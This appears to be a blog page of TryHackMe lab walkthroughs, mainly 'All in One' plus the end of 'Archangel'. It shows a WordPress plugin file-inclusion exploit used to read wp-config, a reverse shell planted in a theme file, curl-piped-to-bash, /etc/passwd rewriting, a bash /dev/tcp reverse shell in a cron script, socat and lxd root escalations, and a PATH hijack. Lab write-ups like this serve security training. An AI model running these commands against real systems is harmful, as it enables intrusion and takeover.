root@kali:~/tryhackme/archangle# fg

archangel@ubuntu:~$ 

Now, I can read the 3rd flag

flag3

Privilege Escalation to root


Under the secrets folder, I find a file named backup. Looking into this file, I find it is an ELF executable owned by root but can be executed by anyone

archangel@ubuntu:~/secret$ file backup 
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped

archangel@ubuntu:~/secret$ ls -la backup 
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup

I would like to know what this executable does, so I run strings against it. Here I find that it copies all files in the myfiles folder using cp.

archangel@ubuntu:~/secret$ strings backup 
/lib64/ld-linux-x86-64.so.2
setuid        
system      
__cxa_finalize                           
setgid                                                                                        
__libc_start_main          
libc.so.6
GLIBC_2.2.5        
_ITM_deregisterTMCloneTable
__gmon_start__           
_ITM_registerTMCloneTable
u+UH                       
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles

This does not use the full path for cp, which means it is vulnerable to a Path Variable Privilege Escalation. By default on linux, most variables are under sbin or bin. However we can create our own path and variable for cp so when we execute this file, it will execute the CP located in our path.

To start, we must craft a file named cp. I did this under the /tmp directory

archangel@ubuntu:/tmp$ echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ chmod 777 cp

Now, I need to change my PATH variable to /tmp

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH

With my path changed, when I execute backup, it will look for the cp file under the tmp directory and execute it. Since root owns the file, root will excute it

archangel@ubuntu:/tmp$ ~/secret/backup 
root@ubuntu:/tmp# 

As root, I can now read the final flag

root

thm-allinonemj-public

All in One is an easy Linux box on TryHackMe.

Enumeration


Starting off with an nmap scan, I find port 21, 22 and 80 open

root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan  
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)  
Nmap scan report for 10.10.166.147                             
Host is up (0.22s latency).                                         
Not shown: 997 closed ports                                        
PORT   STATE SERVICE VERSION                                       
21/tcp open  ftp     vsftpd 3.0.3                                    
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)            
| ftp-syst:                                                   
|   STAT:                                                           
| FTP server status:                                             
|      Connected to ::ffff:10.2.8.75                               
|      Logged in as ftp                                               
|      TYPE: ASCII                                                     
|      No session bandwidth limit                                    
|      Session timeout in seconds is 300                                
|      Control connection is plain text                               
|      Data connections will be plain text                         
|      At session startup, client count was 4                           
|      vsFTPd 3.0.3 - secure, fast, stable                           
|_End of status                                                          
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                           
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)           
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)               
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)         
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                      
|_http-server-header: Apache/2.4.29 (Ubuntu)                           
|_http-title: Apache2 Ubuntu Default Page: It works                     
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel               
                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

FTP Enumeration

Since FTP is allowing anonymous access, I login and start to poke around

root@kali:~/tryhackme/allinone# ftp 10.10.166.147

Connected to 10.10.166.147.                  
220 (vsFTPd 3.0.3)                          
Name (10.10.166.147:root): anonymous           
331 Please specify the password.            
Password:                               
230 Login successful.               
Remote system type is UNIX.    
Using binary mode to transfer files. 
 
ftp> dir -a                                                           
200 PORT command successful. Consider using PASV.      
150 Here comes the directory listing.                  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .. 
226 Directory send OK. 

Nothing is located here, so I try to upload files, however I am not allowed to do that

ftp> put new                       
local: new remote: new                              
200 PORT command successful. Consider using PASV. 
553 Could not create file. 

Moving onto to port 80, I run gobuster to look for any directories. Here I find /wordpress

HTTP Enumeration

root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.166.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html
[+] Timeout:        10s
===============================================================
2020/12/09 15:39:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)

Since /wordpress is open, I can run wpscan to gather more information

root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress                                                                                                                                             
_______________________________________________________________                                         
         __          _______   _____                                                                    
         \ \        / /  __ \ / ____|                                                                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                  
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \      
            \  /\  /  | |     ____) | (__| (_| | | | |                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                  
                                                                                                        
         WordPress Security Scanner by the WPScan Team               
                         Version 3.7.6            
       Sponsored by Automattic - https://automattic.com/            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                       
_______________________________________________________________                
                                                                               
[i] It seems like you have not updated the database for some time.                
[?] Do you want to update now? [Y]es [N]o, default: [N]N                           
[+] URL: http://10.10.166.147/wordpress/                                            
[+] Started: Wed Dec  9 16:54:36 2020                                      
                                                    
Interesting Finding(s):                               

[+] http://10.10.166.147/wordpress/           
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)                                                    
 | Found By: Headers (Passive Detection)
 | Confidence: 100%                                                                                     
                                                    
[+] http://10.10.166.147/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                                 
 | References:                                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API 
 | References:                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
                                                    
[+] http://10.10.166.147/wordpress/readme.html                                                          
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                      
                                                    
[+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%              
                                                                                                        
[+] http://10.10.166.147/wordpress/wp-cron.php                                                          
 | Found By: Direct Access (Aggressive Detection)                                                       
 | Confidence: 60%                                                                                      
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299                        
                                                    
[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
                                                    
[+] WordPress theme in use: twentytwenty                                                                
 | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/      
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z                                                               
 | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt                                                                                                                              
 | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team                                                                                                                                                                                    
 | Author URI: https://wordpress.org/
 |                                    
 | Found By: Css Style In Homepage (Passive Detection)
 |                    
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <====================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Dec  9 16:54:52 2020

Exploit


Mail-Masta Exploit

Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db

etcpasswd

Looking through this exploit, I find that that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd is a working exploit as I can view the file

etcpasswd

Since this is working properly, I need to find a file to read that will give me useful information. I find a medium article detailing on how to extract the wp-config file by converting it to base64 first. To do this, I just need to edit the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

base64

This outputs a large base64 value. I take this value and put it in a file named wp-config. I then decrypt it to properly read the file

root@kali:~/tryhackme/allinone# cat wp-config | base64 -d

.......................................................

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', '*******************' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

.......................................................

WordPress Reverse Shell

With this password, I can login to the wordpress website using this password. Once logged in, I navigate to Appearance > Theme Editor. I then select 404 Template (404.php) and replace the contents with a php reverse shell. If you wish to read up more on how to gain a reverse shell on wordpress, I recommend checking out this article by Hacking Articles

theme

Once I finish editing this file, I save it and set up a netcat listener. Once my listener is running, I navigate to /wp-content/themes/twentytwenty/404.php to gain a reverse shell

root@kali:~/tryhackme/allinone# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:59:22 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation as www-data


Before running any scans, I want to import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.4$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/allinone# stty raw -echo
root@kali:~/tryhackme/allinone# fg

bash-4.4$ 

I then run LinEnum.sh and find several ways to escalate my privileges straight to root

bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash 

SUID

Looking at the SUID section of LinEnum, it immediately points out 3 known vulnerable SUID files. I will be using gtfobins to exploit these

suid

Starting off with bash, I can use look on gtfobins to find the correct syntax to exploit it with bash

bash-4.4$ bash -p
bash-4.4# 

Looking at chmod on gtfobins, I find that it will not drop me a shell, but allow me to edit the permissions on any file. You can edit the root.txt and user.txt file to be able to read them, but I want to gain root access. I instead change the /etc/passwd file so I can insert my own password.

bash-4.4# chmod 0777 /etc/passwd
bash-4.4# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1672 Oct  6 11:57 /etc/passwd

I need to generate a password using openssl to insert into the /etc/passwd file

root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password
$1$root$1fvaXuILgb4rdRlHdQ80N/

Now edit the file and replace the x next to root with the new hash

bash-4.4$ vi /etc/passwd

root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash

After saving this, we can login to root with the password of password

bash-4.4$ su root       
Password: 
root@elyana:/# 

Cronjob

Looking at the cronjobs, I find that root is running one out of /var/backups/script.sh

cron

Navigating there, I see I am allowed to edit the file

bash-4.4$ ls -la
total 52
drwxr-xr-x  2 root root  4096 Oct  7 13:41 .
drwxr-xr-x 14 root root  4096 Oct  5 19:43 ..
-rw-r--r--  1 root root 32890 Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root  3570 Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root    73 Oct  7 13:37 script.sh

Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey

echo ‘#!/bin/bash’ > script.sh
echo ‘bash -i >& /dev/tcp/10.9.2.255/9002 0>&1’ >> script.sh

With this edited, I set up a netcat listener and wait for a few moments. I then recieve a connection and a root shell

root@kali:~/tryhackme/allinone# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036
bash: cannot set terminal process group (19460): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# 

Elevating to elyana


Moving backwards, I will work as www-data and try to elevate to elyana.

Reading the hint.txt file on elyana desktop I find that the password for this user is stored somewhere

bash-4.4$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I start looking around for anything that is useful. Under /etc/ I find an interesting result

find / -user elyana -type f 2>/dev/null

This looks promissing, so I read the file and find credentials.

bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: *********

Another way of finding this file is running linpeas

pass

Testing this password, I can login to elyana

bash-4.4$ su elyana
Password: 
bash-4.4$ whoami
elyana

Privilege Escalation as elyana


Like www-data, there are several ways to elevate to root as elyana. I will outline a few methods here. I rerun LinEnum.sh to help find results

Sudo

The first thing I do is run sudo -l to see if I am allowed to run any commands as sudo. Here, I find I can run socat

bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

Looking on gtfobins I see an easy way to escalte to root. Running this command gives me root access

bash-4.4$ sudo socat stdin exec:/bin/sh
whoami
root

or use ( and cath with a netcat listener)

sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane

lxd

Looking at LinEnum I find that we are a member of the lxd group

lxd

This is a popular exploit and I will be following this guide to do so.

First, I download the alpine builder and build it on my local machine.

root@kali:~/tryhackme/allinone# git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (31/31), done.

root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/

root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine 

Determining the latest release... v3.12
..................................................................................
OK: 8 MiB in 19 packages

Once this is done building, I upload it to the machine and import it

bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
--2020-12-10 02:23:07--  http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199386 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   321KB/s    in 16s     

2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386]

lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage

I want to double check it has been created properly

bash-4.4$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | fa664dd4e321 | no     | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

The image was created properly, so I can now start this and execute it to gain root access

bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite

bash~4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

bash-4.4$ lxc start ignite

bash-4.4$ lxc exec ignite /bin/sh

~ # whoami
root

Finally the user.txt and root.txt are encoded using base64, go ahead decode them, and submit your flags 🚩🚩!

This was a fun box to be honest and it contains some of the most important ways into exploiting a system.

Protected: pg-panic-private

This content is password protected. To view it please enter your password below:

Posted on